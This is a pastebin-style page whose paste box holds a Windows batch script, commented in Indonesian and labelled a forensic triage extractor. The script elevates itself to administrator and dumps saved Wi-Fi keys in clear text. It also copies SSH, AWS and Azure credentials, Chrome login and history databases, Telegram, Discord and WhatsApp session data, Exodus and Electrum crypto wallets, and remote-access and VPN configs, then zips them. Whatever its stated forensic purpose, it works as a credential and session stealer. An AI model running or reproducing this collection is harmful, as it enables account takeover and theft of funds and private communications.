Pastebin Clone
Home
Create Paste
Create Paste
Title
Content
@echo off setlocal enabledelayedexpansion color 0B :: =================================================== :: 1. AUTO-ELEVATE TO ADMINISTRATOR :: =================================================== net session >nul 2>&1 if %errorLevel% == 0 ( goto :START_PROCESS ) else ( echo [!] Hak akses Administrator diperlukan. Meminta izin sistem... powershell -Command "Start-Process '%~f0' -Verb RunAs" exit /b ) :START_PROCESS :: =================================================== :: 2. INISIALISASI FOLDER & BANNER ABOUT :: =================================================== set "TIMESTAMP=%date:~10,4%%date:~4,2%%date:~7,2%_%time:~0,2%%time:~3,2%%time:~6,2%" set "TIMESTAMP=%TIMESTAMP: =0%" set "OUTDIR=%USERPROFILE%\Desktop\JUDOL_FORENSIC_%TIMESTAMP%" cls echo =================================================== echo LOGICAL FORENSICS TRIAGE EXTRACTOR v4.0 echo Target: Programmer/Dev echo. echo Created By Rasi Tech echo =================================================== echo [+] Target Output: %OUTDIR%.zip echo [+] Memulai Ekstraksi... echo. mkdir "%OUTDIR%\01_Network_DNS" mkdir "%OUTDIR%\02_System_Activity_Logs" mkdir "%OUTDIR%\03_Dev_Infrastruktur" mkdir "%OUTDIR%\04_Cloud_SSH_Keys" mkdir "%OUTDIR%\05_Browser_Databases" mkdir "%OUTDIR%\06_Communication_Sessions" mkdir "%OUTDIR%\07_Crypto_Wallets" mkdir "%OUTDIR%\08_Remote_VPN_Logs" :: --------------------------------------------------- :: 3. NETWORK & WIFI :: --------------------------------------------------- echo [+] 1/8 Mengekstrak Network, DNS & Wifi... ipconfig /all > "%OUTDIR%\01_Network_DNS\ipconfig.txt" ipconfig /displaydns > "%OUTDIR%\01_Network_DNS\dns_cache.txt" netstat -anob > "%OUTDIR%\01_Network_DNS\active_connections.txt" 2>nul for /f "tokens=2 delims=:" %%a in ('netsh wlan show profiles ^| findstr /C:"All User Profile"') do ( set "ssid=%%a" set "ssid=!ssid:~1!" netsh wlan show profile name="!ssid!" key=clear > "%OUTDIR%\01_Network_DNS\wifi_!ssid!.txt" 2>nul ) :: --------------------------------------------------- :: 4. SYSTEM LOGS & CLIPBOARD :: --------------------------------------------------- echo [+] 2/8 Mengekstrak System Logs & Clipboard... wevtutil epl Security "%OUTDIR%\02_System_Activity_Logs\Security.evtx" 2>nul wevtutil epl System "%OUTDIR%\02_System_Activity_Logs\System.evtx" 2>nul powershell -Command "Get-Clipboard" > "%OUTDIR%\02_System_Activity_Logs\clipboard_last.txt" 2>nul reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /s > "%OUTDIR%\02_System_Activity_Logs\user_assist.txt" :: --------------------------------------------------- :: 5. DEV ARTIFACTS (Docker, Git, VS Code) :: --------------------------------------------------- echo [+] 3/8 Mengekstrak Jejak Programmer... docker ps -a > "%OUTDIR%\03_Dev_Infrastruktur\docker_containers.txt" 2>nul if exist "%USERPROFILE%\.gitconfig" copy "%USERPROFILE%\.gitconfig" "%OUTDIR%\03_Dev_Infrastruktur\" if exist "%AppData%\Code\User\globalStorage\storage.json" copy "%AppData%\Code\User\globalStorage\storage.json" "%OUTDIR%\03_Dev_Infrastruktur\vscode_recent.json" copy "C:\Windows\System32\drivers\etc\hosts" "%OUTDIR%\03_Dev_Infrastruktur\" :: --------------------------------------------------- :: 6. CLOUD & SSH KEYS (Akses Server Backend) :: --------------------------------------------------- echo [+] 4/8 Mengekstrak Cloud & SSH Keys... if exist "%USERPROFILE%\.ssh" xcopy /s /y /i "%USERPROFILE%\.ssh" "%OUTDIR%\04_Cloud_SSH_Keys\SSH" >nul 2>&1 if exist "%USERPROFILE%\.aws" xcopy /s /y /i "%USERPROFILE%\.aws" "%OUTDIR%\04_Cloud_SSH_Keys\AWS" >nul 2>&1 if exist "%USERPROFILE%\.azure" xcopy /s /y /i "%USERPROFILE%\.azure" "%OUTDIR%\04_Cloud_SSH_Keys\Azure" >nul 2>&1 :: --------------------------------------------------- :: 7. BROWSER DATA (Tutup Browser Terlebih Dahulu) :: --------------------------------------------------- echo [+] 5/8 Mengekstrak Browser Databases... taskkill /F /IM chrome.exe /T >nul 2>&1 taskkill /F /IM msedge.exe /T >nul 2>&1 taskkill /F /IM brave.exe /T >nul 2>&1 set "CHROME_PATH=%LocalAppData%\Google\Chrome\User Data\Default" if exist "%CHROME_PATH%\History" copy "%CHROME_PATH%\History" "%OUTDIR%\05_Browser_Databases\Chrome_History" if exist "%CHROME_PATH%\Login Data" copy "%CHROME_PATH%\Login Data" "%OUTDIR%\05_Browser_Databases\Chrome_Login" :: --------------------------------------------------- :: 8. COMMUNICATION (Telegram, Discord, WA) :: --------------------------------------------------- echo [+] 6/8 Mengekstrak Sesi Komunikasi... if exist "%AppData%\Telegram Desktop\tdata" ( xcopy /s /y /i /c "%AppData%\Telegram Desktop\tdata" "%OUTDIR%\06_Communication_Sessions\Telegram_tdata" >nul 2>&1 ) if exist "%AppData%\discord\Local Storage\leveldb" ( xcopy /s /y /i /c "%AppData%\discord\Local Storage\leveldb" "%OUTDIR%\06_Communication_Sessions\Discord_db" >nul 2>&1 ) if exist "%LocalAppData%\Packages\5319275A.WhatsAppDesktop_cv1g1gvanyjgm\LocalState" ( xcopy /s /y /i /c "%LocalAppData%\Packages\5319275A.WhatsAppDesktop_cv1g1gvanyjgm\LocalState" "%OUTDIR%\06_Communication_Sessions\WhatsApp_DB" >nul 2>&1 ) :: --------------------------------------------------- :: 9. CRYPTO WALLETS :: --------------------------------------------------- echo [+] 7/8 Mengekstrak Crypto Wallets... if exist "%AppData%\Exodus\exodus.wallet" xcopy /s /y /i "%AppData%\Exodus\exodus.wallet" "%OUTDIR%\07_Crypto_Wallets\Exodus" >nul 2>&1 if exist "%AppData%\Electrum\wallets" xcopy /s /y /i "%AppData%\Electrum\wallets" "%OUTDIR%\07_Crypto_Wallets\Electrum" >nul 2>&1 :: --------------------------------------------------- :: 10. REMOTE & VPN :: --------------------------------------------------- echo [+] 8/8 Mengekstrak Remote & VPN Logs... if exist "%AppData%\AnyDesk" xcopy /s /y /i "%AppData%\AnyDesk" "%OUTDIR%\08_Remote_VPN_Logs\AnyDesk" >nul 2>&1 if exist "%AppData%\TeamViewer" xcopy /s /y /i "%AppData%\TeamViewer" "%OUTDIR%\08_Remote_VPN_Logs\TeamViewer" >nul 2>&1 if exist "%USERPROFILE%\OpenVPN\config" xcopy /s /y /i "%USERPROFILE%\OpenVPN\config" "%OUTDIR%\08_Remote_VPN_Logs\OpenVPN" >nul 2>&1 :: --------------------------------------------------- :: 11. ZIPPING & CLEANUP :: --------------------------------------------------- echo. echo [+] Mengompresi semua bukti ke ZIP... powershell -Command "Compress-Archive -Path '%OUTDIR%' -DestinationPath '%OUTDIR%.zip' -Force" rd /s /q "%OUTDIR%" echo. echo =================================================== echo [BERHASIL] Proses Triage Selesai. echo File Barang Bukti: %OUTDIR%.zip echo =================================================== pause
Syntax Highlighting
Plain Text
PHP
JavaScript
Python
HTML
Expiration Time
Never
1 Hour
1 Day
1 Week
Visibility
Public
Private
Save Paste
Cancel